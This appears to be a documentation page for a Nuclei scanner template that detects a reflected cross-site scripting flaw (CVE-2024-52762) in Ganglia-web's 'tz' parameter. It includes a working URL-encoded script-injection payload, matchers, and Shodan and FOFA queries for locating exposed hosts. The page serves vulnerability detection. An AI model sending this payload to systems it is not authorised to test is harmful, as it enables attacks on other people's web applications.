Ganglia Web Interface (v3.7.3 - v3.7.6) - Cross-Site Scripting
ID: CVE-2024-52762
Severity: medium
Author: DhiyaneshDk
Tags: cve,cve2024,ganglia,xss
Description
Section titled “Description”A cross-site scripting (XSS) vulnerability in the component /master/header.php of Ganglia-web v3.73 to v3.76 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the “tz” parameter.
YAML Source
Section titled “YAML Source”id: CVE-2024-52762
info: name: Ganglia Web Interface (v3.7.3 - v3.7.6) - Cross-Site Scripting author: DhiyaneshDk severity: medium description: | A cross-site scripting (XSS) vulnerability in the component /master/header.php of Ganglia-web v3.73 to v3.76 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the "tz" parameter. classification: cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N cvss-score: 5.4 cve-id: CVE-2024-52762 cwe-id: CWE-79 epss-score: 0.00045 epss-percentile: 0.16715 cpe: cpe:2.3:a:ganglia:ganglia-web:*:*:*:*:*:*:*:* metadata: verified: true max-request: 1 vendor: ganglia product: ganglia-web shodan-query: http.html:"ganglia_form.submit()" fofa-query: body="ganglia_form.submit()" tags: cve,cve2024,ganglia,xss
http: - raw: - | GET /ganglia/?tz=%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1 Host: {{Hostname}}
matchers-condition: and matchers: - type: word part: body words: - '"><script>alert(document.domain)</script>">' - 'ganglia' condition: and
- type: word part: content_type words: - "text/html"# digest: 4b0a004830460221009c6fc51a65aa3d490d9e26d48c4bedc7d3bdd1675070168f1976b5a47552a54f022100d650b61a54c3f4c25d26714a6e7a974ab5063f0d6ff6786e9a3a43b70072bdb4:922c64590222798bb761d5b6d8e72950Guide to check the vulnerabilities
Section titled “Guide to check the vulnerabilities”This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.
$ nuclei -u "URL" -t "http/cves/2024/CVE-2024-52762.yaml"